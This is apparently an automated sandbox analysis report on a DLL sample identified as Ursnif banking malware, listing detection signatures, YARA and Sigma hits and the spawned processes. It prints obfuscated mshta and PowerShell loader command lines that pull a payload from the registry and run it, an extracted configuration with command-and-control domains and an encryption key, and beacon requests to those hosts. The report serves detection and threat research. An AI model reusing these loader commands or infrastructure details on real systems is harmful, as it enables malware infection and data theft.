Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6.png

Overview

General Information

Sample Name:6.png (renamed file extension from png to dll)
Analysis ID:539457
MD5:ac57d694b86d8532b38d3d62f6de3afc
SHA1:c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256:fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags:dllexegeofencedGoziisfbITAursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6360 cmdline: loaddll32.exe "C:\Users\user\Desktop\6.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6400 cmdline: rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 3492 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6388 cmdline: regsvr32.exe /s C:\Users\user\Desktop\6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 4912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 6580 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • BackgroundTransferHost.exe (PID: 5876 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • mshta.exe (PID: 4036 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1488 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 3696 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 496 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6540 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 27 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: Suspicious Call by OrdinalShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ProcessId: 6400
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7012, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, ProcessId: 6552
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 3492
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132839804557459233.7132.DefaultAppDomain.powershell

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
            Machine Learning detection for sampleShow sources
            Source: 6.dllJoe Sandbox ML: detected
            Source: 6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: berukoneru.website
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: windows.update3.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187
            Source: Joe Sandbox ViewASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
